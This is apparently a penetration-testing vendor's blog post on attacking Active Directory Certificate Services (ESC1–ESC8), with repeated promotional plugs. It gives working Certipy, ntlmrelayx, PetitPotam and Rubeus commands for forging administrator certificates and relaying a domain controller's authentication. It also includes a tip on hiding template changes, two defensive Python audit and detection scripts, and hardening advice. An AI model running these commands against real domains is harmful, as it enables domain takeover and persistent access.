Active Directory Certificate Services (AD CS) is one of the most overlooked attack surfaces in Windows enterprise environments. While organizations pour resources into hardening their domain controllers and patching endpoint vulnerabilities, their Public Key Infrastructure (PKI) quietly becomes a goldmine for attackers. Since SpecterOps published their groundbreaking research "Certified Pre-Owned" in 2021, AD CS misconfigurations have become a staple in red team operations and real-world threat actor playbooks alike.
This blog walks through how AD CS exploitation works, the most critical attack paths, practical commands used during engagements, and what organizations must do to reduce their exposure. If your environment runs AD CS and has never been audited for these vulnerabilities, you are likely sitting on a critical risk you do not even know exists.
If you want a professional team to assess your AD CS infrastructure, Redfox Cybersecurity offers specialized penetration testing services that cover PKI misconfigurations, certificate abuse, and full Active Directory attack chains.
What Is Active Directory Certificate Services and Why Does It Matter
AD CS is Microsoft's implementation of a PKI role that allows organizations to issue and manage digital certificates. These certificates are used for a wide range of functions including smart card authentication, SSL/TLS, code signing, and encrypted email. In Active Directory environments, certificates can be used to authenticate as any user, including domain administrators, if the underlying certificate templates are misconfigured.
The reason AD CS is so dangerous from an attacker's perspective is the combination of three factors: widespread deployment across enterprises, deeply trusted infrastructure by design, and a well-documented history of insecure default configurations. Certificates obtained through abuse can be used for persistent access that survives password resets, making them particularly attractive for advanced persistent threat actors.
Setting Up Your AD CS Enumeration Environment
Before any exploitation begins, you need to enumerate the environment. The two primary tools used by pentesters are Certify (by SpecterOps, written in C#) and Certipy (a Python implementation by Oliver Lyak that is often preferred on Linux-based attack boxes).
Enumerating AD CS with Certify
Run the following from a Windows attack box or compromised host:
Certify.exe cas
This command lists all Certificate Authorities in the domain, their configurations, and whether they allow remote enrollment. Follow this with:
Certify.exe find /vulnerable
This is the most important enumeration command. It identifies all certificate templates that have exploitable misconfigurations, filtered by what the current user can enroll in. The output will flag templates with issues like low-privileged enrollment rights, dangerous EKUs (Extended Key Usages), or the ability to supply a Subject Alternative Name (SAN).
Enumerating AD CS with Certipy (Linux)
certipy find -u lowprivuser@corp.local -p 'Password123!' -dc-ip 10.10.10.1 -vulnerable -stdout
The -vulnerable flag performs automatic analysis and highlights templates susceptible to the ESC1 through ESC8 attack paths. Certipy also integrates with BloodHound, allowing you to export results and visualize certificate-based attack paths:
certipy find -u lowprivuser@corp.local -p 'Password123!' -dc-ip 10.10.10.1 -bloodhound
This outputs a zip file you can drag directly into BloodHound for graph-based analysis.
ESC1: Misconfigured Certificate Templates Allowing SAN Specification
ESC1 is arguably the most commonly exploited AD CS misconfiguration. It occurs when a certificate template allows the enrollee to specify a Subject Alternative Name (SAN) in the request, the template has a dangerous Extended Key Usage such as Client Authentication or Smart Card Logon, and enrollment permissions are granted to low-privileged groups like Domain Users.
Exploiting ESC1 with Certipy
Once you have identified a vulnerable template (for example, one named "VulnTemplate"), exploit it as follows:
certipy req -u lowprivuser@corp.local -p 'Password123!' -ca 'CORP-CA' -target ca.corp.local -template VulnTemplate -upn administrator@corp.local -dc-ip 10.10.10.1
The -upn flag sets the User Principal Name in the SAN to administrator@corp.local. If the template is vulnerable, the CA will issue a certificate asserting that you are the domain administrator.
Next, use that certificate to request a Kerberos TGT:
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
Certipy will return a TGT and the NTLM hash for the administrator account. You now have domain admin access without ever knowing or cracking the administrator's password.
Want a real-world test of whether your organization is vulnerable to ESC1 and other certificate abuse techniques? Redfox Cybersecurity's penetration testing team conducts in-depth AD CS assessments that identify and validate these exact attack paths in your environment.
ESC2 and ESC3: Abusing Any Purpose and Enrollment Agent Templates
ESC2: The "Any Purpose" EKU Problem
ESC2 occurs when a certificate template has the "Any Purpose" EKU or no EKU at all, and low-privileged users can enroll. A certificate with Any Purpose can be used for any application, including client authentication.
certipy req -u lowprivuser@corp.local -p 'Password123!' -ca 'CORP-CA' -template AnyPurposeTemplate -dc-ip 10.10.10.1
ESC3: Enrollment Agent Abuse
ESC3 is a two-stage attack. First, you obtain an Enrollment Agent certificate from a template that issues the Certificate Request Agent EKU to low-privileged enrollees:
certipy req -u lowprivuser@corp.local -p 'Password123!' -ca 'CORP-CA' -template EnrollmentAgentTemplate -dc-ip 10.10.10.1
Then use that Enrollment Agent certificate to enroll on behalf of another user (such as the domain administrator) in a second template that accepts requests co-signed by an Enrollment Agent (the built-in User template in this example):
certipy req -u lowprivuser@corp.local -p 'Password123!' -ca 'CORP-CA' -template User -on-behalf-of 'CORP\administrator' -pfx enrollmentagent.pfx -dc-ip 10.10.10.1
You end up with a certificate for the administrator account issued entirely through legitimate PKI mechanisms.
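The template-level preconditions described for ESC1, ESC2 and ESC3 above can be checked mechanically during an audit rather than only by running the attack tools. The following Python script is an added example, not code from the original post or from Certify/Certipy. It evaluates template records using the AD CS schema attributes (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage) together with the principals holding the Enroll right, and reports which ESC class each template matches. The template records, template names and the list of "low-privilege" principals are constructed sample data; reading live template objects from the Configuration naming context is left to whatever LDAP tooling you use.

```python
"""Audit certificate template records for ESC1/ESC2/ESC3 conditions (added example)."""
from dataclasses import dataclass

# Bits from the AD CS template schema
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag: requester may set the SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: CA manager approval required

# EKU object identifiers
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
OID_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
OID_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
OID_ANY_PURPOSE = "2.5.29.37.0"
OID_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"

# EKUs that let a certificate be used for domain authentication
AUTH_EKUS = {OID_CLIENT_AUTH, OID_SMARTCARD_LOGON, OID_PKINIT_CLIENT_AUTH, OID_ANY_PURPOSE}
# Principals whose Enroll right effectively means "any domain account" (constructed list)
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


@dataclass
class Template:
    name: str
    name_flag: int           # msPKI-Certificate-Name-Flag
    enrollment_flag: int     # msPKI-Enrollment-Flag
    ra_signatures: int       # msPKI-RA-Signature (authorized signatures required)
    ekus: list               # pKIExtendedKeyUsage OIDs; an empty list means no EKU restriction
    enroll_principals: list  # principals holding the Enroll right in the template's DACL


def low_priv_can_enroll(t: Template) -> bool:
    return any(p in LOW_PRIV_PRINCIPALS for p in t.enroll_principals)


def requires_approval(t: Template) -> bool:
    # Manager approval or a required co-signature blocks all three self-service abuses.
    return bool(t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS) or t.ra_signatures > 0


def classify(t: Template) -> list:
    """Return the ESC classes whose template-level preconditions this template meets."""
    findings = []
    if not low_priv_can_enroll(t) or requires_approval(t):
        return findings
    supplies_subject = bool(t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    usable_for_auth = not t.ekus or bool(AUTH_EKUS & set(t.ekus))
    if supplies_subject and usable_for_auth:
        findings.append("ESC1")  # requester chooses the SAN on an authentication certificate
    if not t.ekus or OID_ANY_PURPOSE in t.ekus:
        findings.append("ESC2")  # Any Purpose / no EKU: usable for any application
    if OID_CERT_REQUEST_AGENT in t.ekus:
        findings.append("ESC3")  # Enrollment Agent certificate available to low-privileged users
    return findings


def audit(templates: list) -> dict:
    """Map template name -> list of ESC findings, omitting templates with no findings."""
    report = {}
    for t in templates:
        findings = classify(t)
        if findings:
            report[t.name] = findings
    return report


# Constructed sample templates mirroring the names used in the text above
SAMPLE_TEMPLATES = [
    Template("VulnTemplate", CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0, [OID_CLIENT_AUTH], ["Domain Users"]),
    Template("AnyPurposeTemplate", 0, 0, 0, [OID_ANY_PURPOSE], ["Domain Users"]),
    Template("EnrollmentAgentTemplate", 0, 0, 0, [OID_CERT_REQUEST_AGENT], ["Domain Users"]),
    # Same SAN right as VulnTemplate, but manager approval neutralises it
    Template("ApprovedSAN", CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, CT_FLAG_PEND_ALL_REQUESTS, 0,
             [OID_CLIENT_AUTH], ["Domain Users"]),
    # Only a privileged group can enroll, so there is no low-privilege path
    Template("AdminOnly", CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0, [OID_CLIENT_AUTH], ["Domain Admins"]),
]

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_TEMPLATES).items():
        print(f"{name}: {', '.join(findings)}")
```

The two clean samples show the cheapest fixes for a flagged template: requiring CA manager approval (msPKI-Enrollment-Flag bit 0x2) or removing Enroll from broad groups both drop a template out of every finding without touching its EKUs.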
ESC4: Vulnerable Certificate Template Access Control
ESC4 arises when a low-privileged user has write access (WriteDacl, WriteOwner, or WriteProperty) over a certificate template object in Active Directory. This allows the attacker to modify the template's configuration, introduce ESC1-style weaknesses, and then exploit the newly vulnerable template.
With Certipy, you can modify a template and temporarily enable the SAN flag:
certipy template -u lowprivuser@corp.local -p 'Password123!' -template TargetTemplate -save-old -dc-ip 10.10.10.1
After modification, proceed with ESC1 exploitation steps. After completing the attack, restore the original template configuration to avoid detection.
ESC6: The EDITF_ATTRIBUTESUBJECTALTNAME2 Flag
ESC6 is a CA-level misconfiguration rather than a template-level issue. When the EDITF_ATTRIBUTESUBJECTALTNAME2 flag is set on a CA, any certificate request can include a SAN regardless of what the template specifies. This means even templates that are considered safe can be weaponized.
Check for this flag using Certify:
Certify.exe cas
Look for EDITF_ATTRIBUTESUBJECTALTNAME2 in the CA flags output. If present, any template allowing Client Authentication becomes an ESC1-equivalent vulnerability.
Exploit with Certipy by supplying the UPN flag during enrollment:
certipy req -u lowprivuser@corp.local -p 'Password123!' -ca 'CORP-CA' -template SafeLookingTemplate -upn administrator@corp.local -dc-ip 10.10.10.1
ESC8: NTLM Relay to AD CS HTTP Enrollment Endpoints
ESC8 targets the web enrollment interface that many AD CS deployments expose over HTTP. If this endpoint is not protected by HTTPS or does not require Extended Protection for Authentication (EPA), it is vulnerable to NTLM relay attacks.
Setting Up the Relay
Use Impacket's ntlmrelayx to relay incoming NTLM authentication to the AD CS web enrollment endpoint:
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Then trigger authentication from a target machine. One reliable method is using PetitPotam to coerce authentication from the Domain Controller itself:
python3 PetitPotam.py -u '' -p '' attackerip 10.10.10.1
The DC authenticates to your relay, which forwards the request to the CA web enrollment interface. The CA issues a certificate for the DC's computer account. You can then use that certificate with PKINIT to request a TGT for the DC account and subsequently perform a DCSync.
ESC8 is particularly dangerous in environments running Active Directory Federation Services (ADFS) or those where the NTLM relay surface is not fully mapped. If you have not audited your NTLM relay exposure recently, Redfox Cybersecurity's red team services include full relay attack chain simulations.
Post-Exploitation: Persisting with Certificates
One of the most insidious aspects of AD CS abuse is persistence. A certificate issued for a domain admin account remains valid until it expires, regardless of password changes or account lockouts. This gives attackers a persistent authentication mechanism that is notoriously difficult to detect and revoke without mature PKI monitoring.
Extracting Certificates for Offline Use
Once you have a PFX file, you can also extract the certificate on its own (the -nokey option omits the private key) for inspection or storage:
certipy cert -pfx administrator.pfx -nokey -out administrator.crt
To use the certificate for Pass-the-Certificate attacks with Rubeus on a Windows host:
Rubeus.exe asktgt /user:administrator /certificate:administrator.pfx /password:certpassword /ptt
The /ptt flag injects the TGT directly into the current logon session, giving you immediate Kerberos access as the administrator.
Detecting and Mitigating AD CS Attacks
Detection Strategies
Windows Event ID 4886 logs certificate requests, and Event ID 4887 logs issued certificates. Monitoring for certificates issued to high-privilege accounts (Domain Admins, Enterprise Admins) from templates that should never issue such certificates, or where the requester differs from the account named in the SAN, is a reliable detection signal.
Additionally, Kerberos authentication using PKINIT (Pass-the-Certificate) generates Event ID 4768 with a pre-authentication type and certificate information fields (issuer, serial number, thumbprint) that distinguish it from password-based logons. Correlating this with unusual source IPs or times provides another detection layer.
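The two signals above can be turned into a small triage rule. The following Python script is an added example, not code from the original post or from any vendor product: it parses a handful of constructed 4887 and 4768 event records (simplified "Field: value" lines, not the exact Windows message text), flags 4887 events whose SAN UPN names a different account than the requester, and flags 4768 certificate logons (pre-authentication type 16, certificate issuer populated) for privileged accounts from hosts outside a constructed allowlist of admin workstations. The account names, addresses, template names and thumbprint are all constructed.

```python
"""Triage constructed AD CS / Kerberos security events for certificate abuse (added example)."""
import re

PRIVILEGED_ACCOUNTS = {"administrator", "krbtgt"}   # constructed watch list
ADMIN_WORKSTATIONS = {"10.10.10.50"}                 # constructed allowlist of admin hosts

# Constructed sample events; real exports carry more fields and different formatting.
SAMPLE_EVENTS = """\
EventID: 4887
Requester: CORP\\lowprivuser
Attributes: CertificateTemplate:VulnTemplate;SAN:upn=administrator@corp.local
Subject: CN=lowprivuser

EventID: 4887
Requester: CORP\\alice
Attributes: CertificateTemplate:User
Subject: CN=alice

EventID: 4768
Account Name: administrator
Client Address: ::ffff:10.10.10.99
Pre-Authentication Type: 16
Certificate Issuer Name: CORP-CA
Certificate Thumbprint: [CONSTRUCTED-THUMBPRINT]

EventID: 4768
Account Name: alice
Client Address: ::ffff:10.10.10.50
Pre-Authentication Type: 2
Certificate Issuer Name:
"""


def parse_events(text: str) -> list:
    """Split blank-line separated records into dicts of field -> value."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        event = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")   # first colon only; values may contain colons
            event[key.strip()] = value.strip()
        events.append(event)
    return events


def parse_attributes(attributes: str) -> dict:
    """Split the 4887 Attributes field (';'-separated here) into name -> value."""
    parsed = {}
    for item in attributes.split(";"):
        key, _, value = item.partition(":")
        if key:
            parsed[key.strip()] = value.strip()
    return parsed


def account_of(principal: str) -> str:
    """Normalise 'CORP\\user', 'user@corp.local' or 'user' to a lower-case sAMAccountName."""
    return principal.split("\\")[-1].split("@")[0].lower()


def analyse(events: list) -> list:
    """Return (severity, message) alerts for suspicious certificate activity."""
    alerts = []
    for event in events:
        event_id = event.get("EventID")
        if event_id == "4887":
            attrs = parse_attributes(event.get("Attributes", ""))
            san = attrs.get("SAN", "")
            requester = account_of(event.get("Requester", ""))
            if san.lower().startswith("upn="):
                target = account_of(san[4:])
                if target != requester:   # ESC1/ESC6 pattern: SAN points at someone else
                    severity = "high" if target in PRIVILEGED_ACCOUNTS else "medium"
                    alerts.append((severity, f"4887: {requester} obtained a certificate with SAN for "
                                             f"{target} via template {attrs.get('CertificateTemplate')}"))
        elif event_id == "4768":
            is_pkinit = event.get("Pre-Authentication Type") == "16" and event.get("Certificate Issuer Name")
            if is_pkinit:
                account = account_of(event.get("Account Name", ""))
                address = event.get("Client Address", "").replace("::ffff:", "")
                if account in PRIVILEGED_ACCOUNTS and address not in ADMIN_WORKSTATIONS:
                    alerts.append(("high", f"4768: certificate logon for {account} from unexpected host {address}"))
    return alerts


if __name__ == "__main__":
    for severity, message in analyse(parse_events(SAMPLE_EVENTS)):
        print(f"[{severity}] {message}")
```

In production the same two rules sit naturally in a SIEM query; the point of the requester-versus-SAN comparison is that it fires on the issuance itself, before the certificate is ever used to log on.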
Hardening Recommendations
Disable the EDITF_ATTRIBUTESUBJECTALTNAME2 flag on all CAs unless there is a documented operational need. Audit all certificate templates and remove the ability for low-privileged users to enroll in templates with Client Authentication EKU and SAN specification rights. Require CA Manager approval for sensitive templates. Enable HTTPS on all AD CS web enrollment endpoints and enforce EPA. Regularly run Certify or Certipy in your environment as part of your internal security reviews.
Most organizations that discover these vulnerabilities do so for the first time during a penetration test. Redfox Cybersecurity provides comprehensive AD and PKI penetration testing that gives you a clear, prioritized remediation roadmap.
Wrapping Up
Active Directory Certificate Services represents one of the highest-impact, lowest-visibility attack surfaces in enterprise Windows environments today. From ESC1 template abuse to ESC8 NTLM relay chains, the attack paths are well-documented, tooling is mature, and exploitation is achievable by intermediate-level pentesters and threat actors alike. What is not mature in most organizations is the detection, monitoring, and hardening of their PKI infrastructure.
The good news is that these vulnerabilities are entirely fixable with proper auditing, access control review, and configuration hardening. The first step is knowing whether you are exposed.
Redfox Cybersecurity specializes in Active Directory security assessments that go beyond surface-level enumeration. Their team conducts real-world attack simulations including AD CS exploitation chains, lateral movement, and persistence techniques to give organizations a ground-truth view of their security posture.
Get in touch with Redfox Cybersecurity today to schedule a penetration test and find out what an attacker would find before they do.